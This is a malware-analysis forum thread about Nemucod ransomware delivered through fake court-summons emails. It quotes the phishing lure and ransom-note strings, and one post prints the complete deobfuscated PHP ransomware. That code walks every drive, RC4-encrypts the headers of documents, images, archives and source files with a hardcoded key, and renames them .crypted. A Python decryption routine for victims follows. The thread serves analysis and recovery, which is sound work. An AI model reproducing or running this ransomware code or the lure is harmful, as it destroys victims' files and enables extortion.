A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #28339  by maddog4012
 Mon Apr 18, 2016 4:35 pm
Came across this over the weekend; the JavaScript came as an attachment with the following e-mail message:

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


When executed it downloads a random file with a .png.exe extension.
 #28390  by parviz
 Mon Apr 25, 2016 5:39 am
maddog4012 wrote: Came across this over the weekend; the JavaScript came as an attachment with the following e-mail message [...]
Can't find the password.
 #28400  by TETYYSs
 Mon Apr 25, 2016 11:47 am
parviz wrote: Can't find the password.
Protip: it's on the current page you're viewing.
 #28440  by Antelox
 Sun May 01, 2016 8:40 pm
Attached is the archive which contains the original email's attachment.

I wrote simple Python scripts to extract the key and recover the files infected by this latest Nemucod variant:

https://github.com/Antelox/NemucodFR

BR,

Antelox
 #29709  by xors
 Mon Dec 12, 2016 9:45 pm
Hello all,

The dropper is a .wsf file. It downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. Some strings:
- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

 #29712  by Antelox
 Tue Dec 13, 2016 7:32 am
xors wrote: The dropper is a .wsf file. It downloads two files, php4ts.dll and a file which will run a PHP file (a.php). It looks like the PHP file is doing the encryption. [...]

It's the latest Nemucod ransomware PHP variant, the one which uses RC4 encryption. The deobfuscated script is below:
<?php
set_time_limit(0);
ini_set("display_errors", "Off");
// Walk every existing drive letter from C: to Z:.
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
    $s = chr(92);                                                  // backslash path separator
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs"); // hardcoded RC4 key (30 bytes)
    $a = "e";                                                      // mode: "e" = encrypt, "d" = decrypt
    // Skip system, program, temp and cache directories and the recycle bin.
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);                                    // recurse into subdirectories
        // Targeted extensions in encrypt mode, or *.crypted in decrypt mode.
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                $b = fread($fp, 2048);                             // only the first 2048 bytes are touched
                // RC4 key-scheduling algorithm (KSA)
                $z = array();
                for ($i = 0;$i < 256;$i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0;$i < 256;$i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                // RC4 keystream generation (PRGA), XORed with the header bytes
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0;$y < strlen($b);$y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c);                                   // overwrite the header in place
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted");   // append .crypted
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o)); // strip .crypted
                }
            }
        }
    }
    closedir($dp);
}
BR,

Antelox
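As an added example (not Antelox's NemucodFR scripts nor code from the thread), a Python recovery routine mirroring the decryption path of the script above: RC4 with the key from $k applied to the first 2048 bytes, then the .crypted suffix removed. The key value and the 2048-byte window are taken from the posted script; the magic-byte sanity check and the helper names are assumptions added so a wrong key is noticed before a file is overwritten.

```python
import base64
import os

# Key from the posted script's $k; other samples of this variant embed their own key.
KEY = base64.b64decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs")
HEADER_LEN = 2048  # the script reads and rewrites only fread($fp, 2048)
# Assumed sanity check: magic bytes of a few targeted formats, so a wrong key is caught before writing.
MAGICS = {b"%PDF": "pdf", b"PK\x03\x04": "zip/docx/xlsx", b"\xff\xd8\xff": "jpeg",
          b"\xd0\xcf\x11\xe0": "ole2", b"Rar!": "rar", b"7z\xbc\xaf": "7z"}

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 exactly as the PHP does it: KSA over a 256-entry table, then PRGA XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key scheduling
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                           # keystream generation and XOR
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

def recover(blob: bytes, key: bytes = KEY) -> bytes:
    """RC4 is symmetric: re-keying the first 2048 bytes restores the original header."""
    return rc4(key, blob[:HEADER_LEN]) + blob[HEADER_LEN:]

def guess_type(blob: bytes):
    """Name of the format whose magic matches the header, or None if unrecognised."""
    for magic, name in MAGICS.items():
        if blob.startswith(magic):
            return name
    return None

def recover_file(path: str, key: bytes = KEY):
    """Restore <name>.crypted in place and drop the suffix (the script's "d" branch).
    Returns the new path, or None if the file is skipped (wrong suffix or unknown type)."""
    if not path.lower().endswith(".crypted"):
        return None
    with open(path, "r+b") as fh:
        plain = rc4(key, fh.read(HEADER_LEN))
        if guess_type(plain) is None:
            return None                         # probably the wrong key: leave it alone
        fh.seek(0)
        fh.write(plain)
    new_path = path[:-len(".crypted")]
    os.rename(path, new_path)
    return new_path
```

Files larger than 2048 bytes keep their tail intact, so even with a wrong key only the header is at risk, which is why the check runs before anything is written back.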